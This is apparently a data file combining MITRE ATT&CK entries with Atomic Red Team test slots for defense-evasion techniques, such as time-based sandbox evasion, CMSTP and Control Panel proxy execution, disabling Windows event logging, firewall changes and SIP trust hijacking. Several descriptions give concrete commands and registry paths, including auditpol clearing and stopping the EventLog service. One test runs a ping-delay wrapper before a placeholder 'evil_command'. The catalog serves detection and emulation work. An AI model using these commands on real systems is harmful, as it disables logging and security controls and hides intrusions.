x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Viren Chaudhari, Qualys x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Linux - macOS - Windows x_mitre_version: '1.0' atomic_tests: [] T1497.003: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0 created: '2020-03-06T21:11:11.225Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1497/003 external_id: T1497.003 - source_name: ISACA Malware Tricks description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.' url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:44.870Z' name: Time Based Evasion description: "Adversaries may employ various time-based methods to detect virtualization and analysis environments, particularly those that attempt to manipulate time mechanisms to simulate longer elapses of time. This may include enumerating time-based properties, such as uptime or the system clock. \n\nAdversaries may use calls like `GetTickCount` and `GetSystemTimeAsFileTime` to discover if they are operating within a virtual machine or sandbox, or may be able to identify a sandbox accelerating time by sampling and calculating the expected value for an environment's timestamp before and after execution of a sleep function.(Citation: ISACA Malware Tricks)" kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: discovery x_mitre_attack_spec_version: 3.3.0 x_mitre_contributors: - Jorge Orchilles, SCYTHE - Ruben Dodge, @shotgunner101 - Jeff Felling, Red Canary - Deloitte Threat Library Team x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Linux - macOS - Windows x_mitre_version: '2.0' identifier: T1497.003 atomic_tests: - name: Delay execution with ping auto_generated_guid: 8b87dd03-8204-478c-bac3-3959f6528de3 description: 'Uses the ping command to introduce a delay before executing a malicious payload. ' supported_platforms: - linux - macos input_arguments: evil_command: description: Command to run after the delay type: string default: whoami ping_count: description: Number of ping requests to send (higher counts increase the delay) type: integer default: 250 executor: command: | ping -c #{ping_count} 8.8.8.8 > /dev/null #{evil_command} name: sh T1218.003: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--4cbc6a62-9e34-4f94-8a19-5c1a11392a49 created: '2020-01-23T18:27:30.656Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1218/003 external_id: T1218.003 - source_name: Twitter CMSTP Usage Jan 2018 description: Carr, N. (2018, January 31). Here is some early bad cmstp.exe... Retrieved September 12, 2024. url: https://x.com/ItsReallyNick/status/958789644165894146 - source_name: Microsoft Connection Manager Oct 2009 description: Microsoft. (2009, October 8). How Connection Manager Works. Retrieved April 11, 2018. url: https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2003/cc786431(v=ws.10) - source_name: MSitPros CMSTP Aug 2017 description: Moe, O. (2017, August 15). Research on CMSTP.exe. Retrieved April 11, 2018. url: https://msitpros.com/?p=3960 - source_name: GitHub Ultimate AppLocker Bypass List description: Moe, O. (2018, March 1). Ultimate AppLocker Bypass List. Retrieved April 10, 2018. url: https://github.com/api0cradle/UltimateAppLockerByPassList - source_name: Endurant CMSTP July 2018 description: Seetharaman, N. (2018, July 7). Detecting CMSTP-Enabled Code Execution and UAC Bypass With Sysmon.. Retrieved November 17, 2024. url: https://web.archive.org/web/20190316220149/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/ - source_name: Twitter CMSTP Jan 2018 description: Tyrer, N. (2018, January 30). CMSTP.exe - remote .sct execution applocker bypass. Retrieved September 12, 2024. url: https://x.com/NickTyrer/status/958450014111633408 object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:45.149Z' name: 'Signed Binary Proxy Execution: CMSTP' description: |- Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections. Adversaries may supply CMSTP.exe with INF files infected with malicious commands. (Citation: Twitter CMSTP Usage Jan 2018) Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010) / ”Squiblydoo”, CMSTP.exe may be abused to load and execute DLLs (Citation: MSitPros CMSTP Aug 2017) and/or COM scriptlets (SCT) from remote servers. (Citation: Twitter CMSTP Jan 2018) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) This execution may also bypass AppLocker and other application control defenses since CMSTP.exe is a legitimate binary that may be signed by Microsoft. CMSTP.exe can also be abused to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) and execute arbitrary commands from a malicious INF through an auto-elevated COM interface. (Citation: MSitPros CMSTP Aug 2017) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Nik Seetharaman, Palantir - Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Windows x_mitre_version: '2.2' identifier: T1218.003 atomic_tests: [] T1562.002: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--4eb28bed-d11a-4641-9863-c2ac017d910a created: '2020-02-21T20:46:36.688Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1562/002 external_id: T1562.002 - source_name: Disable_Win_Event_Logging description: " dmcxblue. (n.d.). Disable Windows Event Logging. Retrieved September 10, 2021." url: https://dmcxblue.gitbook.io/red-team-notes-2-0/red-team-techniques/defense-evasion/t1562-impair-defenses/disable-windows-event-logging - source_name: def_ev_win_event_logging description: 'Chandel, R. (2021, April 22). Defense Evasion: Windows Event Logging (T1562.002). Retrieved September 14, 2021.' url: https://www.hackingarticles.in/defense-evasion-windows-event-logging-t1562-002/ - source_name: EventLog_Core_Technologies description: 'Core Technologies. (2021, May 24). Essential Windows Services: EventLog / Windows Event Log. Retrieved September 14, 2021.' url: https://www.coretechnologies.com/blog/windows-services/eventlog/ - source_name: Audit_Policy_Microsoft description: Daniel Simpson. (2017, April 19). Audit Policy. Retrieved September 13, 2021. url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/audit-policy - source_name: Windows Log Events description: Franklin Smith. (n.d.). Windows Security Log Events. Retrieved February 21, 2020. url: https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/ - source_name: disable_win_evt_logging description: 'Heiligenstein, L. (n.d.). REP-25: Disable Windows Event Logging. Retrieved April 7, 2022.' url: https://ptylu.github.io/content/report/report.html?report=25 - source_name: auditpol description: Jason Gerend, et al. (2017, October 16). auditpol. Retrieved September 1, 2021. url: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/auditpol - source_name: winser19_file_overwrite_bug_twitter description: Naceri, A. (2021, November 7). Windows Server 2019 file overwrite bug. Retrieved April 7, 2022. url: https://web.archive.org/web/20211107115646/https://twitter.com/klinix5/status/1457316029114327040 - source_name: T1562.002_redcanaryco description: redcanaryco. (2021, September 3). T1562.002 - Disable Windows Event Logging. Retrieved September 13, 2021. url: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md - source_name: Advanced_sec_audit_policy_settings description: Simpson, D. et al. (2017, April 19). Advanced security audit policy settings. Retrieved September 14, 2021. url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/advanced-security-audit-policy-settings - source_name: auditpol.exe_STRONTIC description: STRONTIC. (n.d.). auditpol.exe. Retrieved September 9, 2021. url: https://strontic.github.io/xcyclopedia/library/auditpol.exe-214E0EA1F7F7C27C82D23F183F9D23F1.html - source_name: evt_log_tampering description: 'svch0st. (2020, September 30). Event Log Tampering Part 1: Disrupting the EventLog Service. Retrieved September 14, 2021.' url: https://svch0st.medium.com/event-log-tampering-part-1-disrupting-the-eventlog-service-8d4b7d67335c object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:45.425Z' name: 'Impair Defenses: Disable Windows Event Logging' description: |- Adversaries may disable Windows event logging to limit data that can be leveraged for detections and audits. Windows event logs record user and system activity such as login attempts, process creation, and much more.(Citation: Windows Log Events) This data is used by security tools and analysts to generate detections. The EventLog service maintains event logs from various system components and applications.(Citation: EventLog_Core_Technologies) By default, the service automatically starts when a system powers on. An audit policy, maintained by the Local Security Policy (secpol.msc), defines which system events the EventLog service logs. Security audit policy settings can be changed by running secpol.msc, then navigating to Security Settings\Local Policies\Audit Policy for basic audit policy settings or Security Settings\Advanced Audit Policy Configuration for advanced audit policy settings.(Citation: Audit_Policy_Microsoft)(Citation: Advanced_sec_audit_policy_settings) auditpol.exe may also be used to set audit policies.(Citation: auditpol) Adversaries may target system-wide logging or just that of a particular application. For example, the Windows EventLog service may be disabled using the Set-Service -Name EventLog -Status Stopped or sc config eventlog start=disabled commands (followed by manually stopping the service using Stop-Service -Name EventLog).(Citation: Disable_Win_Event_Logging)(Citation: disable_win_evt_logging) Additionally, the service may be disabled by modifying the “Start” value in HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog then restarting the system for the change to take effect.(Citation: disable_win_evt_logging) There are several ways to disable the EventLog service via registry key modification. First, without Administrator privileges, adversaries may modify the "Start" value in the key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-Security, then reboot the system to disable the Security EventLog.(Citation: winser19_file_overwrite_bug_twitter) Second, with Administrator privilege, adversaries may modify the same values in HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System and HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-Application to disable the entire EventLog.(Citation: disable_win_evt_logging) Additionally, adversaries may use auditpol and its sub-commands in a command prompt to disable auditing or clear the audit policy. To enable or disable a specified setting or audit category, adversaries may use the /success or /failure parameters. For example, auditpol /set /category:”Account Logon” /success:disable /failure:disable turns off auditing for the Account Logon category.(Citation: auditpol.exe_STRONTIC)(Citation: T1562.002_redcanaryco) To clear the audit policy, adversaries may run the following lines: auditpol /clear /y or auditpol /remove /allusers.(Citation: T1562.002_redcanaryco) By disabling Windows event logging, adversaries can operate while leaving less evidence of a compromise behind. kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Prasanth Sadanala, Cigna Information Protection (CIP) - Threat Response Engineering Team - Lucas Heiligenstein x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Windows x_mitre_version: '1.4' identifier: T1562.002 atomic_tests: [] T1218.002: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--4ff5d6a8-c062-4c68-a778-36fc5edd564f created: '2020-01-23T19:59:52.630Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1218/002 external_id: T1218.002 - source_name: Microsoft Implementing CPL description: M. (n.d.). Implementing Control Panel Items. Retrieved January 18, 2018. url: https://msdn.microsoft.com/library/windows/desktop/cc144185.aspx - source_name: TrendMicro CPL Malware Jan 2014 description: Mercês, F. (2014, January 27). CPL Malware - Malicious Control Panel Items. Retrieved January 18, 2018. url: https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf - source_name: TrendMicro CPL Malware Dec 2013 description: Bernardino, J. (2013, December 17). Control Panel Files Used As Malicious Attachments. Retrieved January 18, 2018. url: https://blog.trendmicro.com/trendlabs-security-intelligence/control-panel-files-used-as-malicious-attachments/ - source_name: Palo Alto Reaver Nov 2017 description: Grunzweig, J. and Miller-Osborn, J. (2017, November 10). New Malware with Ties to SunOrcal Discovered. Retrieved November 16, 2017. url: https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/ - source_name: ESET InvisiMole June 2020 description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020.' url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:45.979Z' name: 'Signed Binary Proxy Execution: Control Panel' description: |- Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings. Control Panel items are registered executable (.exe) or Control Panel (.cpl) files, the latter are actually renamed dynamic-link library (.dll) files that export a CPlApplet function.(Citation: Microsoft Implementing CPL)(Citation: TrendMicro CPL Malware Jan 2014) For ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel.(Citation: Microsoft Implementing CPL) Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file.(Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014)(Citation: TrendMicro CPL Malware Dec 2013) Malicious Control Panel items can be delivered via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns(Citation: TrendMicro CPL Malware Jan 2014)(Citation: TrendMicro CPL Malware Dec 2013) or executed as part of multi-stage malware.(Citation: Palo Alto Reaver Nov 2017) Control Panel items, specifically CPL files, may also bypass application and/or file extension allow lists. Adversaries may also rename malicious DLL files (.dll) with Control Panel file extensions (.cpl) and register them to HKCU\Software\Microsoft\Windows\CurrentVersion\Control Panel\Cpls. Even when these registered DLLs do not comply with the CPL file specification and do not export CPlApplet functions, they are loaded and executed through its DllEntryPoint when Control Panel is executed. CPL files not exporting CPlApplet are not directly executable.(Citation: ESET InvisiMole June 2020) kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - ESET x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Windows x_mitre_version: '2.1' identifier: T1218.002 atomic_tests: [] T1599.001: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--4ffc1794-ec3b-45be-9e52-42dbcb2af2de created: '2020-10-19T16:48:08.241Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1599/001 external_id: T1599.001 - source_name: RFC1918 description: IETF Network Working Group. (1996, February). Address Allocation for Private Internets. Retrieved October 20, 2020. url: https://tools.ietf.org/html/rfc1918 object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:46.071Z' name: Network Address Translation Traversal description: "Adversaries may bridge network boundaries by modifying a network device’s Network Address Translation (NAT) configuration. Malicious modifications to NAT may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks.\n\nNetwork devices such as routers and firewalls that connect multiple networks together may implement NAT during the process of passing packets between networks. When performing NAT, the network device will rewrite the source and/or destination addresses of the IP address header. Some network designs require NAT for the packets to cross the border device. A typical example of this is environments where internal networks make use of non-Internet routable addresses.(Citation: RFC1918)\n\nWhen an adversary gains control of a network boundary device, they may modify NAT configurations to send traffic between two separated networks, or to obscure their activities. In network designs that require NAT to function, such modifications enable the adversary to overcome inherent routing limitations that would normally prevent them from accessing protected systems behind the border device. In network designs that do not require NAT, adversaries may use address translation to further obscure their activities, as changing the addresses of packets that traverse a network boundary device can make monitoring data transmissions more challenging for defenders. \n\nAdversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to change the operating system of a network device, implementing their own custom NAT mechanisms to further obscure their activities." kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.3.0 x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Network Devices x_mitre_version: '1.2' atomic_tests: [] T1036.011: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--514dc7b3-0b80-4382-80a9-2e2d294f5019 created: '2025-03-27T20:37:52.269Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1036/011 external_id: T1036.011 - source_name: Microsoft XorDdos Linux Stealth 2022 description: 'Ratnesh Pandey, Yevgeny Kulakov, and Jonathan Bar Or with Saurabh Swaroop. (2022, May 19). Rise in XorDdos: A deeper look at the stealthy DDoS malware targeting Linux devices. Retrieved September 27, 2023.' url: https://www.microsoft.com/en-us/security/blog/2022/05/19/rise-in-xorddos-a-deeper-look-at-the-stealthy-ddos-malware-targeting-linux-devices/ - source_name: Sandfly BPFDoor 2022 description: The Sandfly Security Team. (2022, May 11). BPFDoor - An Evasive Linux Backdoor Technical Analysis. Retrieved September 29, 2023. url: https://sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/ object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-04-15T19:58:30.391Z' name: Overwrite Process Arguments description: "Adversaries may modify a process's in-memory arguments to change its name in order to appear as a legitimate or benign process. On Linux, the operating system stores command-line arguments in the process’s stack and passes them to the `main()` function as the `argv` array. The first element, `argv[0]`, typically contains the process name or path - by default, the command used to actually start the process (e.g., `cat /etc/passwd`). By default, the Linux `/proc` filesystem uses this value to represent the process name. The `/proc//cmdline` file reflects the contents of this memory, and tools like `ps` use it to display process information. Since arguments are stored in user-space memory at launch, this modification can be performed without elevated privileges. \n\nDuring runtime, adversaries can erase the memory used by all command-line arguments for a process, overwriting each argument string with null bytes. This removes evidence of how the process was originally launched. They can then write a spoofed string into the memory region previously occupied by `argv[0]` to mimic a benign command, such as `cat resolv.conf`. The new command-line string is reflected in `/proc//cmdline` and displayed by tools like `ps`.(Citation: Sandfly BPFDoor 2022)(Citation: Microsoft XorDdos Linux Stealth 2022) " kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Linux x_mitre_version: '1.0' atomic_tests: [] T1550: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--51a14c76-dd3b-440b-9c20-2bf91d25a814 created: '2020-01-30T16:18:36.873Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1550 external_id: T1550 - source_name: TechNet Audit Policy description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved June 3, 2016. url: https://technet.microsoft.com/en-us/library/dn487457.aspx - source_name: NIST Authentication description: NIST. (n.d.). Authentication. Retrieved January 30, 2020. url: https://csrc.nist.gov/glossary/term/authentication - source_name: NIST MFA description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved September 25, 2024. url: https://csrc.nist.gov/glossary/term/multi_factor_authentication object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:46.684Z' name: Use Alternate Authentication Material description: "Adversaries may use alternate authentication material, such as password hashes, Kerberos tickets, and application access tokens, in order to move laterally within an environment and bypass normal system access controls. \n\nAuthentication processes generally require a valid identity (e.g., username) along with one or more authentication factors (e.g., password, pin, physical smart card, token generator, etc.). Alternate authentication material is legitimately generated by systems after a user or application successfully authenticates by providing a valid identity and the required authentication factor(s). Alternate authentication material may also be generated during the identity creation process.(Citation: NIST Authentication)(Citation: NIST MFA)\n\nCaching alternate authentication material allows the system to verify an identity has successfully authenticated without asking the user to reenter authentication factor(s). Because the alternate authentication must be maintained by the system—either in memory or on disk—it may be at risk of being stolen through [Credential Access](https://attack.mitre.org/tactics/TA0006) techniques. By stealing alternate authentication material, adversaries are able to bypass system access controls and authenticate to systems without knowing the plaintext password or any additional authentication factors.\n" kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: lateral-movement x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Blake Strom, Microsoft Threat Intelligence - Pawel Partyka, Microsoft Threat Intelligence x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: false x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Windows - SaaS - IaaS - Containers - Identity Provider - Office Suite - Linux x_mitre_version: '1.5' atomic_tests: [] T1562.004: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--5372c5fe-f424-4def-bcd5-d3a8e770f07b created: '2020-02-21T21:00:48.814Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1562/004 external_id: T1562.004 - source_name: Broadcom ESXi Firewall description: Broadcom. (2025, March 24). Add Allowed IP Addresses for an ESXi Host by Using the VMware Host Client. Retrieved March 26, 2025. url: https://techdocs.broadcom.com/us/en/vmware-cis/vsphere/vsphere/7-0/add-allowed-ip-addresses-for-an-esxi-host-by-using-the-vmware-host-client.html - source_name: Huntress BlackCat description: Carvey, H. (2024, February 28). BlackCat Ransomware Affiliate TTPs. Retrieved March 27, 2024. url: https://www.huntress.com/blog/blackcat-ransomware-affiliate-ttps - source_name: Trellix Rnasomhouse 2024 description: Pham Duy Phuc, Max Kersten, Noël Keijzer, and Michaël Schrijver. (2024, February 14). RansomHouse am See. Retrieved March 26, 2025. url: https://www.trellix.com/en-au/blogs/research/ransomhouse-am-see/ - source_name: change_rdp_port_conti description: 'The DFIR Report. (2022, March 1). "Change RDP port" #ContiLeaks. Retrieved September 12, 2024.' url: https://x.com/TheDFIRReport/status/1498657772254240768 object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:47.755Z' name: 'Impair Defenses: Disable or Modify System Firewall' description: |- Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules. This can be done numerous ways depending on the operating system, including via command-line, editing Windows Registry keys, and Windows Control Panel. Modifying or disabling a system firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed. For example, adversaries may add a new firewall rule for a well-known protocol (such as RDP) using a non-traditional and potentially less securitized port (i.e. [Non-Standard Port](https://attack.mitre.org/techniques/T1571)).(Citation: change_rdp_port_conti) Adversaries may also modify host networking settings that indirectly manipulate system firewalls, such as interface bandwidth or network connection request thresholds.(Citation: Huntress BlackCat) Settings related to enabling abuse of various [Remote Services](https://attack.mitre.org/techniques/T1021) may also indirectly modify firewall rules. In ESXi, firewall rules may be modified directly via the esxcli command line interface (e.g., via `esxcli network firewall set`) or via the vCenter user interface.(Citation: Trellix Rnasomhouse 2024)(Citation: Broadcom ESXi Firewall) kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - ESXi - Linux - macOS - Network Devices - Windows x_mitre_version: '1.3' identifier: T1562.004 atomic_tests: [] T1553.003: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--543fceb5-cb92-40cb-aacf-6913d4db58bc created: '2020-02-05T19:34:04.910Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1553/003 external_id: T1553.003 - source_name: Entrust Enable CAPI2 Aug 2017 description: Entrust Datacard. (2017, August 16). How do I enable CAPI 2.0 logging in Windows Vista, Windows 7 and Windows 2008 Server?. Retrieved January 31, 2018. url: http://www.entrust.net/knowledge-base/technote.cfm?tn=8165 - source_name: GitHub SIP POC Sept 2017 description: Graeber, M. (2017, September 14). PoCSubjectInterfacePackage. Retrieved January 31, 2018. url: https://github.com/mattifestation/PoCSubjectInterfacePackage - source_name: SpectorOps Subverting Trust Sept 2017 description: Graeber, M. (2017, September). Subverting Trust in Windows. Retrieved January 31, 2018. url: https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf - source_name: Microsoft Catalog Files and Signatures April 2017 description: Hudek, T. (2017, April 20). Catalog Files and Digital Signatures. Retrieved January 31, 2018. url: https://docs.microsoft.com/windows-hardware/drivers/install/catalog-files - source_name: Microsoft Audit Registry July 2012 description: Microsoft. (2012, July 2). Audit Registry. Retrieved January 31, 2018. url: https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/dd941614(v=ws.10) - source_name: Microsoft Registry Auditing Aug 2016 description: Microsoft. (2016, August 31). Registry (Global Object Access Auditing). Retrieved January 31, 2018. url: https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn311461(v=ws.11) - source_name: Microsoft Authenticode description: Microsoft. (n.d.). Authenticode. Retrieved January 31, 2018. url: https://msdn.microsoft.com/library/ms537359.aspx - source_name: Microsoft WinVerifyTrust description: Microsoft. (n.d.). WinVerifyTrust function. Retrieved January 31, 2018. url: https://msdn.microsoft.com/library/windows/desktop/aa388208.aspx - source_name: EduardosBlog SIPs July 2008 description: Navarro, E. (2008, July 11). SIP’s (Subject Interface Package) and Authenticode. Retrieved January 31, 2018. url: https://blogs.technet.microsoft.com/eduardonavarro/2008/07/11/sips-subject-interface-package-and-authenticode/ object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:48.200Z' name: 'Subvert Trust Controls: SIP and Trust Provider Hijacking' description: |- Adversaries may tamper with SIP and trust provider components to mislead the operating system and application control tools when conducting signature validation checks. In user mode, Windows Authenticode (Citation: Microsoft Authenticode) digital signatures are used to verify a file's origin and integrity, variables that may be used to establish trust in signed code (ex: a driver with a valid Microsoft signature may be handled as safe). The signature validation process is handled via the WinVerifyTrust application programming interface (API) function, (Citation: Microsoft WinVerifyTrust) which accepts an inquiry and coordinates with the appropriate trust provider, which is responsible for validating parameters of a signature. (Citation: SpectorOps Subverting Trust Sept 2017) Because of the varying executable file types and corresponding signature formats, Microsoft created software components called Subject Interface Packages (SIPs) (Citation: EduardosBlog SIPs July 2008) to provide a layer of abstraction between API functions and files. SIPs are responsible for enabling API functions to create, retrieve, calculate, and verify signatures. Unique SIPs exist for most file formats (Executable, PowerShell, Installer, etc., with catalog signing providing a catch-all (Citation: Microsoft Catalog Files and Signatures April 2017)) and are identified by globally unique identifiers (GUIDs). (Citation: SpectorOps Subverting Trust Sept 2017) Similar to [Code Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may abuse this architecture to subvert trust controls and bypass security policies that allow only legitimately signed code to execute on a system. Adversaries may hijack SIP and trust provider components to mislead operating system and application control tools to classify malicious (or any) code as signed by: (Citation: SpectorOps Subverting Trust Sept 2017) * Modifying the Dll and FuncName Registry values in HKLM\SOFTWARE[\WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{SIP_GUID} that point to the dynamic link library (DLL) providing a SIP’s CryptSIPDllGetSignedDataMsg function, which retrieves an encoded digital certificate from a signed file. By pointing to a maliciously-crafted DLL with an exported function that always returns a known good signature value (ex: a Microsoft signature for Portable Executables) rather than the file’s real signature, an adversary can apply an acceptable signature value to all files using that SIP (Citation: GitHub SIP POC Sept 2017) (although a hash mismatch will likely occur, invalidating the signature, since the hash returned by the function will not match the value computed from the file). * Modifying the Dll and FuncName Registry values in HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{SIP_GUID} that point to the DLL providing a SIP’s CryptSIPDllVerifyIndirectData function, which validates a file’s computed hash against the signed hash value. By pointing to a maliciously-crafted DLL with an exported function that always returns TRUE (indicating that the validation was successful), an adversary can successfully validate any file (with a legitimate signature) using that SIP (Citation: GitHub SIP POC Sept 2017) (with or without hijacking the previously mentioned CryptSIPDllGetSignedDataMsg function). This Registry value could also be redirected to a suitable exported function from an already present DLL, avoiding the requirement to drop and execute 